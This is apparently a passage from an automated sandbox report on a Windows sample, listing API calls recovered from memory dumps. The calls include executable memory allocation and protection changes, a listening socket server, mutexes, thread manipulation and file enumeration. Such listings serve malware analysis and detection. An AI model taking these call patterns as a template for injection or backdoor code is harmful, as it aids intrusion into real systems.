Part of subcall function 00FD5BB5: LeaveCriticalSection.KERNEL32(0111201C,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001,?,00FE4E98,?,00000001), ref: 00FD5C44
Part of subcall function 00FD5BB5: ResumeThread.KERNEL32 ref: 00FD5C5D

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00FD23DE,?,?,?,00000000), ref: 00FD0111

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2FFC2, Relevance: 12.1, APIs: 8, Instructions: 120

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00C323DE,?,?,?,00000000), ref: 00C2FFCE
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C30009
CloseHandle.KERNEL32 ref: 00C3001C

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

memcpy.MSVCRT ref: 00C3003F
memset.MSVCRT ref: 00C30059
memcpy.MSVCRT ref: 00C3009F
memset.MSVCRT ref: 00C300BD

Part of subcall function 00C35B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35B48
Part of subcall function 00C35B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C35B6C
Part of subcall function 00C35B40: CloseHandle.KERNEL32 ref: 00C35B7C
Part of subcall function 00C35B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35BAC

Part of subcall function 00C35BB5: EnterCriticalSection.KERNEL32(0000000C,00000000,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35BBE
Part of subcall function 00C35BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C35BF7
Part of subcall function 00C35BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00C3E48F,00000000,00000000,00000002), ref: 00C35C16
Part of subcall function 00C35BB5: GetLastError.KERNEL32(?,000000FF,00C3E48F,00000000,00000000,00000002,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001), ref: 00C35C20
Part of subcall function 00C35BB5: TerminateThread.KERNEL32 ref: 00C35C28
Part of subcall function 00C35BB5: CloseHandle.KERNEL32 ref: 00C35C2F
Part of subcall function 00C35BB5: LeaveCriticalSection.KERNEL32(0000000C,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35C44
Part of subcall function 00C35BB5: ResumeThread.KERNEL32 ref: 00C35C5D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00C323DE,?,?,?,00000000), ref: 00C30111

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0352004E, Relevance: 12.1, APIs: 8, Instructions: 61

APIs

InterlockedDecrement.KERNEL32(0351F70B), ref: 03520068
InterlockedDecrement.KERNEL32(0351F7BB), ref: 03520075
InterlockedDecrement.KERNEL32(0351F7C3), ref: 03520082
InterlockedDecrement.KERNEL32(0351F7BF), ref: 0352008F
InterlockedDecrement.KERNEL32(0351F7CB), ref: 0352009C
InterlockedDecrement.KERNEL32 ref: 035200B8
InterlockedDecrement.KERNEL32(0351F75F), ref: 035200C8
InterlockedDecrement.KERNEL32(0351F72B), ref: 035200DE

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FCE35B, Relevance: 11.3, APIs: 6, Instructions: 129

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00FCE376
PathAddBackslashW.SHLWAPI(?), ref: 00FCE3A0

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

CreateDirectoryW.KERNEL32(?), ref: 00FCE457
SetFileAttributesW.KERNEL32(?), ref: 00FCE468
CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00FCE481
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00FCE492

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C309C2, Relevance: 11.1, APIs: 5, Instructions: 210

APIs

GetCurrentThreadId.KERNEL32 ref: 00C309D3

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Part of subcall function 00C3043B: memset.MSVCRT ref: 00C304EB
Part of subcall function 00C3043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C304FC
Part of subcall function 00C3043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00C30530
Part of subcall function 00C3043B: memset.MSVCRT ref: 00C30570
Part of subcall function 00C3043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C30581
Part of subcall function 00C3043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00C305C1
Part of subcall function 00C3043B: memset.MSVCRT ref: 00C3062C

Part of subcall function 00C29BA9: SetLastError.KERNEL32(0000000D), ref: 00C29BE4

memcpy.MSVCRT ref: 00C30B42
memset.MSVCRT ref: 00C30BA8
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00C30BBD
GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00C30BC7

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C30643: memset.MSVCRT ref: 00C30654

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD6240, Relevance: 11.0, APIs: 6, Instructions: 115

APIs

lstrlenA.KERNEL32(?,?), ref: 00FD6279
CreateMutexW.KERNEL32(01002974,00000001,?), ref: 00FD62D1
GetLastError.KERNEL32(?,?,?,?), ref: 00FD62E1
CloseHandle.KERNEL32 ref: 00FD62EF

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

memcpy.MSVCRT ref: 00FD6319
memcpy.MSVCRT ref: 00FD632D

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD5406: CreateThread.KERNEL32(00000000,00000000,00FF54A0,?), ref: 00FD5417
Part of subcall function 00FD5406: CloseHandle.KERNEL32 ref: 00FD5422

Part of subcall function 00FD2FB7: ReleaseMutex.KERNEL32 ref: 00FD2FBB
Part of subcall function 00FD2FB7: CloseHandle.KERNEL32 ref: 00FD2FC2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36240, Relevance: 11.0, APIs: 6, Instructions: 115

APIs

lstrlenA.KERNEL32(?,?), ref: 00C36279
CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C362D1
GetLastError.KERNEL32(?,?,?,?), ref: 00C362E1
CloseHandle.KERNEL32 ref: 00C362EF

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

memcpy.MSVCRT ref: 00C36319
memcpy.MSVCRT ref: 00C3632D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C35406: CreateThread.KERNEL32(00000000,00000000,00C554A0,?), ref: 00C35417
Part of subcall function 00C35406: CloseHandle.KERNEL32 ref: 00C35422

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD1B16, Relevance: 10.9, APIs: 6, Instructions: 65

APIs

CreateFileW.KERNEL32(01111EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FD1B2F
GetFileSizeEx.KERNEL32(?,?), ref: 00FD1B42
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00FD1B68
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00FD1B80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD1B9E
CloseHandle.KERNEL32 ref: 00FD1BA7

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FEBBA1, Relevance: 10.9, APIs: 6, Instructions: 57

APIs

Part of subcall function 00FE4214: EnterCriticalSection.KERNEL32(01003510,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FE422E
Part of subcall function 00FE4214: LeaveCriticalSection.KERNEL32(01003510,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FE4261
Part of subcall function 00FE4214: CoTaskMemFree.OLE32(00000000), ref: 00FE42F6
Part of subcall function 00FE4214: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4303
Part of subcall function 00FE4214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00FE431A

PathRemoveBackslashW.SHLWAPI ref: 00FEBBCD
PathRemoveFileSpecW.SHLWAPI ref: 00FEBBDA
PathAddBackslashW.SHLWAPI ref: 00FEBBEB
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 00FEBBFE
CLSIDFromString.OLE32(?,01002DB4,?,?,00000064,?,?,?,?,?,00000064,?,01002DB4,?,?,00000000), ref: 00FEBC1A
memset.MSVCRT ref: 00FEBC2C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD6D02, Relevance: 10.9, APIs: 6, Instructions: 39

APIs

socket.WS2_32(?,00000001,00000006), ref: 00FD6D0E
bind.WS2_32 ref: 00FD6D2B
listen.WS2_32(?,00000001), ref: 00FD6D38
WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00FF15FC,?,?,?), ref: 00FD6D42
closesocket.WS2_32 ref: 00FD6D4B
WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00FF15FC,?,?,?), ref: 00FD6D52

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36D02, Relevance: 10.9, APIs: 6, Instructions: 39

APIs

socket.WS2_32(?,00000001,00000006), ref: 00C36D0E
bind.WS2_32 ref: 00C36D2B
listen.WS2_32(?,00000001), ref: 00C36D38
WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00C515FC,?,?,?), ref: 00C36D42
closesocket.WS2_32 ref: 00C36D4B
WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00C515FC,?,?,?), ref: 00C36D52

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD0C35, Relevance: 10.9, APIs: 6, Instructions: 197

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00FD0C9B
memcpy.MSVCRT ref: 00FD0CB5
VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00FD0CC8
memset.MSVCRT ref: 00FD0D1F
memcpy.MSVCRT ref: 00FD0D33
VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00FD0E22

Part of subcall function 00FD1149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD1158

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C30C35, Relevance: 10.9, APIs: 6, Instructions: 197

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C30C9B
memcpy.MSVCRT ref: 00C30CB5
VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00C30CC8
memset.MSVCRT ref: 00C30D1F
memcpy.MSVCRT ref: 00C30D33
VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00C30E22

Part of subcall function 00C31149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31158

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEFA0A, Relevance: 10.8, APIs: 6, Instructions: 161

APIs

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00FCD004,00000000), ref: 00FEFB0C

Part of subcall function 00FEFE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00FEFB19,?,77C475F0,7C809F91,?,?,?,?,00FCD004,00000000), ref: 00FEFE4D
Part of subcall function 00FEFE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00FEFB19,?,77C475F0,7C809F91,?,?,?,?,00FCD004,00000000), ref: 00FEFE84

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00FCD004,00000000), ref: 00FEFB4D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FEFB5C
SetEvent.KERNEL32 ref: 00FEFB6C
GetExitCodeThread.KERNEL32(?,?), ref: 00FEFB80
CloseHandle.KERNEL32 ref: 00FEFB96

Part of subcall function 00FD5BB5: EnterCriticalSection.KERNEL32(0111201C,01112010,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001,?,00FE4E98,?,00000001), ref: 00FD5BBE
Part of subcall function 00FD5BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FD5BF7
Part of subcall function 00FD5BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00FDE48F,00000000,00000000,00000002), ref: 00FD5C16
Part of subcall function 00FD5BB5: GetLastError.KERNEL32(?,000000FF,00FDE48F,00000000,00000000,00000002,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001), ref: 00FD5C20
Part of subcall function 00FD5BB5: TerminateThread.KERNEL32 ref: 00FD5C28
Part of subcall function 00FD5BB5: CloseHandle.KERNEL32 ref: 00FD5C2F
Part of subcall function 00FD5BB5: LeaveCriticalSection.KERNEL32(0111201C,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001,?,00FE4E98,?,00000001), ref: 00FD5C44
Part of subcall function 00FD5BB5: ResumeThread.KERNEL32 ref: 00FD5C5D

Part of subcall function 00FF01B2: memcmp.MSVCRT ref: 00FF01CB
Part of subcall function 00FF01B2: memcmp.MSVCRT ref: 00FF0227
Part of subcall function 00FF01B2: memcmp.MSVCRT ref: 00FF028D

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FE4CA0: memcpy.MSVCRT ref: 00FE4CC6
Part of subcall function 00FE4CA0: memset.MSVCRT ref: 00FE4D69

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4FA0A, Relevance: 10.8, APIs: 6, Instructions: 161

APIs

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FB0C

Part of subcall function 00C4FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00C4FB19,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FE4D
Part of subcall function 00C4FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00C4FB19,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FE84

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FB4D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C4FB5C
SetEvent.KERNEL32 ref: 00C4FB6C
GetExitCodeThread.KERNEL32(?,?), ref: 00C4FB80
CloseHandle.KERNEL32 ref: 00C4FB96

Part of subcall function 00C35BB5: EnterCriticalSection.KERNEL32(0000000C,00000000,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35BBE
Part of subcall function 00C35BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C35BF7
Part of subcall function 00C35BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00C3E48F,00000000,00000000,00000002), ref: 00C35C16
Part of subcall function 00C35BB5: GetLastError.KERNEL32(?,000000FF,00C3E48F,00000000,00000000,00000002,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001), ref: 00C35C20
Part of subcall function 00C35BB5: TerminateThread.KERNEL32 ref: 00C35C28
Part of subcall function 00C35BB5: CloseHandle.KERNEL32 ref: 00C35C2F
Part of subcall function 00C35BB5: LeaveCriticalSection.KERNEL32(0000000C,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35C44
Part of subcall function 00C35BB5: ResumeThread.KERNEL32 ref: 00C35C5D

Part of subcall function 00C501B2: memcmp.MSVCRT ref: 00C501CB
Part of subcall function 00C501B2: memcmp.MSVCRT ref: 00C50227
Part of subcall function 00C501B2: memcmp.MSVCRT ref: 00C5028D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C44CA0: memcpy.MSVCRT ref: 00C44CC6
Part of subcall function 00C44CA0: memset.MSVCRT ref: 00C44D69

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCA150, Relevance: 10.8, APIs: 7, Instructions: 122

APIs

memcpy.MSVCRT ref: 00FCA18C
memcpy.MSVCRT ref: 00FCA1A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00FCA1D3
memcpy.MSVCRT ref: 00FCA209
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00FCA239
memcpy.MSVCRT ref: 00FCA26F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00FCA29F

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2A150, Relevance: 10.8, APIs: 7, Instructions: 122

APIs

memcpy.MSVCRT ref: 00C2A18C
memcpy.MSVCRT ref: 00C2A1A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00C2A1D3
memcpy.MSVCRT ref: 00C2A209
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00C2A239
memcpy.MSVCRT ref: 00C2A26F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00C2A29F

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF2D0B, Relevance: 10.7, APIs: 6, Instructions: 64

APIs

accept.WS2_32(?,0000EA60), ref: 00FF2D2C
WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00FF2D3E

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00FCD163), ref: 00FF2D95

Part of subcall function 00FF2917: WSACreateEvent.WS2_32(00000000,?,00FF2C15,?,00000000,?,00FF2CD1,?,?,?,?,00000000), ref: 00FF292D
Part of subcall function 00FF2917: WSAEventSelect.WS2_32(?,?,00FF2CD1), ref: 00FF2943
Part of subcall function 00FF2917: WSACloseEvent.WS2_32(?), ref: 00FF2957

Part of subcall function 00FF2855: getsockopt.WS2_32(0000EA60,0000FFFF,00002004,?,?), ref: 00FF288F
Part of subcall function 00FF2855: memset.MSVCRT ref: 00FF28A3

WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00FCD163,?), ref: 00FF2D6F
shutdown.WS2_32(?,00000002), ref: 00FF2D87
closesocket.WS2_32 ref: 00FF2D8E

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C52D0B, Relevance: 10.7, APIs: 6, Instructions: 64

APIs

accept.WS2_32(?,0000EA60), ref: 00C52D2C
WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00C52D3E

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00C2D163), ref: 00C52D95

Part of subcall function 00C52917: WSACreateEvent.WS2_32(00000000,?,00C52C15,?,00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C5292D
Part of subcall function 00C52917: WSAEventSelect.WS2_32(?,?,00C52CD1), ref: 00C52943
Part of subcall function 00C52917: WSACloseEvent.WS2_32(?), ref: 00C52957

Part of subcall function 00C52855: getsockopt.WS2_32(0000EA60,0000FFFF,00002004,?,?), ref: 00C5288F
Part of subcall function 00C52855: memset.MSVCRT ref: 00C528A3

WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00C2D163,?), ref: 00C52D6F
shutdown.WS2_32(?,00000002), ref: 00C52D87
closesocket.WS2_32 ref: 00C52D8E

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351DFC6, Relevance: 10.7, APIs: 7, Instructions: 195

APIs

GetStartupInfoW.KERNEL32(?), ref: 0351DFD1

Part of subcall function 0351FF25: Sleep.KERNEL32(00000000), ref: 0351FF4D

GetFileType.KERNEL32 ref: 0351E104
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0351E13A
GetStdHandle.KERNEL32 ref: 0351E18E
GetFileType.KERNEL32 ref: 0351E1A0
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0351E1CE
SetHandleCount.KERNEL32 ref: 0351E1F7

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FD6378, Relevance: 10.6, APIs: 7, Instructions: 146

APIs

Part of subcall function 00FD568C: TlsSetValue.KERNEL32(00000001,00FD638A), ref: 00FD5699

Part of subcall function 00FEBEE3: CreateMutexW.KERNEL32(01002974,00000000,?), ref: 00FEBF05

GetCurrentThread.KERNEL32 ref: 00FD63A4
SetThreadPriority.KERNEL32 ref: 00FD63AB

Part of subcall function 00FE4B8D: WaitForSingleObject.KERNEL32(00000000,00FD63B6), ref: 00FE4B95

memset.MSVCRT ref: 00FD63ED
lstrlenA.KERNEL32(00000050), ref: 00FD6404

Part of subcall function 00FD5D25: memset.MSVCRT ref: 00FD5D35

Part of subcall function 00FE0A9A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE0AD8
Part of subcall function 00FE0A9A: PathRemoveFileSpecW.SHLWAPI(?), ref: 00FE0B26
Part of subcall function 00FE0A9A: FindFirstFileW.KERNEL32(?,?), ref: 00FE0B93
Part of subcall function 00FE0A9A: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00FE0BEA
Part of subcall function 00FE0A9A: SetLastError.KERNEL32(00000057,?), ref: 00FE0C5B
Part of subcall function 00FE0A9A: CloseHandle.KERNEL32 ref: 00FE0C95
Part of subcall function 00FE0A9A: FindNextFileW.KERNEL32(?,?), ref: 00FE0CC9
Part of subcall function 00FE0A9A: FindClose.KERNEL32 ref: 00FE0CF3

memset.MSVCRT ref: 00FD64CA
memcpy.MSVCRT ref: 00FD64DA

Part of subcall function 00FD6240: lstrlenA.KERNEL32(?,?), ref: 00FD6279
Part of subcall function 00FD6240: CreateMutexW.KERNEL32(01002974,00000001,?), ref: 00FD62D1
Part of subcall function 00FD6240: GetLastError.KERNEL32(?,?,?,?), ref: 00FD62E1
Part of subcall function 00FD6240: CloseHandle.KERNEL32 ref: 00FD62EF
Part of subcall function 00FD6240: memcpy.MSVCRT ref: 00FD6319
Part of subcall function 00FD6240: memcpy.MSVCRT ref: 00FD632D

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

WaitForSingleObject.KERNEL32(00007530), ref: 00FD6504

Part of subcall function 00FD2FB7: ReleaseMutex.KERNEL32 ref: 00FD2FBB
Part of subcall function 00FD2FB7: CloseHandle.KERNEL32 ref: 00FD2FC2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36378, Relevance: 10.6, APIs: 7, Instructions: 146

APIs

Part of subcall function 00C3568C: TlsSetValue.KERNEL32(00000001,00C554A7), ref: 00C35699

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

GetCurrentThread.KERNEL32 ref: 00C363A4
SetThreadPriority.KERNEL32 ref: 00C363AB

Part of subcall function 00C44B8D: WaitForSingleObject.KERNEL32(00000000,00C554CE), ref: 00C44B95

memset.MSVCRT ref: 00C363ED
lstrlenA.KERNEL32(00000050), ref: 00C36404

Part of subcall function 00C35D25: memset.MSVCRT ref: 00C35D35

Part of subcall function 00C40A9A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C40AD8
Part of subcall function 00C40A9A: PathRemoveFileSpecW.SHLWAPI(?), ref: 00C40B26
Part of subcall function 00C40A9A: FindFirstFileW.KERNEL32(?,?), ref: 00C40B93
Part of subcall function 00C40A9A: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00C40BEA
Part of subcall function 00C40A9A: SetLastError.KERNEL32(00000057,?), ref: 00C40C5B
Part of subcall function 00C40A9A: CloseHandle.KERNEL32 ref: 00C40C95
Part of subcall function 00C40A9A: FindNextFileW.KERNEL32(?,?), ref: 00C40CC9
Part of subcall function 00C40A9A: FindClose.KERNEL32 ref: 00C40CF3

memset.MSVCRT ref: 00C364CA
memcpy.MSVCRT ref: 00C364DA

Part of subcall function 00C36240: lstrlenA.KERNEL32(?,?), ref: 00C36279
Part of subcall function 00C36240: CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C362D1
Part of subcall function 00C36240: GetLastError.KERNEL32(?,?,?,?), ref: 00C362E1
Part of subcall function 00C36240: CloseHandle.KERNEL32 ref: 00C362EF
Part of subcall function 00C36240: memcpy.MSVCRT ref: 00C36319
Part of subcall function 00C36240: memcpy.MSVCRT ref: 00C3632D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

WaitForSingleObject.KERNEL32(00007530), ref: 00C36504

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

